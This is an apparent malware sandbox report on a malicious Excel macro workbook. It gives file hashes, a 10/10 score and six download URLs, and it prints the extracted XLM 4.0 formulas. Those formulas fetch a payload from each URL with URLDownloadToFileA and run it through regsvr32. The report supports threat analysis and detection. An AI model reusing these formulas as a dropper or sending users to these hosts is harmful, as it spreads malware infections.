Overview

overview

10

Static

static

10

d584f98ef8...2.xlsm

windows7-x64

10

d584f98ef8...2.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    d584f98ef881372b489c71cfa05242bdd6642026151ab3daba3437da69ca1332

  • Size

    40KB

  • Sample

    241121-andjvsxdjm

  • MD5

    4344a379a77eaf2a10f5d84ae9497a0a

  • SHA1

    f7265d66ab1cdd6ffa512c14eb345c08b3fed1b2

  • SHA256

    d584f98ef881372b489c71cfa05242bdd6642026151ab3daba3437da69ca1332

  • SHA512

    f5c4bc393fd3dcf5a94bb3a7c0c07854fe091e75ae20fd8caadbf2036a2a83b53d8dc206cdd50a97e1f6a66b024a691bac6420071aefad193d01c4a5f5c9601d

  • SSDEEP

    768:tqhdomi1DOevZCwtumwyKfcrND59V+L9Rw4eWrXcTqZ0Vf5XJ:odom4DJwylND59V4jwmXc2CVf5Z

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://nuwayinternational.com/js/ELNnL0in5CbGnHmNc/

http://crm.techopesolutions.com/tttwxore/ihzbh04dT0XaJGAf/

http://techplanbd.xyz/qel424/RSz4/

http://steelcorp-fr.com/wp-content/tmMFW0SOgOjVCO/

https://deine-bewerbung.com/wp-content/TKXpk/

https://livejagat.com/h/L37tCM6ppS/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://nuwayinternational.com/js/ELNnL0in5CbGnHmNc/","..\cre.ocx",0,0) =IF('EFALGV'!D10<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://crm.techopesolutions.com/tttwxore/ihzbh04dT0XaJGAf/","..\cre.ocx",0,0)) =IF('EFALGV'!D12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://techplanbd.xyz/qel424/RSz4/","..\cre.ocx",0,0)) =IF('EFALGV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://steelcorp-fr.com/wp-content/tmMFW0SOgOjVCO/","..\cre.ocx",0,0)) =IF('EFALGV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://deine-bewerbung.com/wp-content/TKXpk/","..\cre.ocx",0,0)) =IF('EFALGV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://livejagat.com/h/L37tCM6ppS/","..\cre.ocx",0,0)) =IF('EFALGV'!D20<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\cre.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://nuwayinternational.com/js/ELNnL0in5CbGnHmNc/
xlm40.dropper

http://crm.techopesolutions.com/tttwxore/ihzbh04dT0XaJGAf/
xlm40.dropper

http://techplanbd.xyz/qel424/RSz4/

Targets

    • Target

      d584f98ef881372b489c71cfa05242bdd6642026151ab3daba3437da69ca1332

    • Size

      40KB

    • MD5

      4344a379a77eaf2a10f5d84ae9497a0a

    • SHA1

      f7265d66ab1cdd6ffa512c14eb345c08b3fed1b2

    • SHA256

      d584f98ef881372b489c71cfa05242bdd6642026151ab3daba3437da69ca1332

    • SHA512

      f5c4bc393fd3dcf5a94bb3a7c0c07854fe091e75ae20fd8caadbf2036a2a83b53d8dc206cdd50a97e1f6a66b024a691bac6420071aefad193d01c4a5f5c9601d

    • SSDEEP

      768:tqhdomi1DOevZCwtumwyKfcrND59V+L9Rw4eWrXcTqZ0Vf5XJ:odom4DJwylND59V4jwmXc2CVf5Z

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks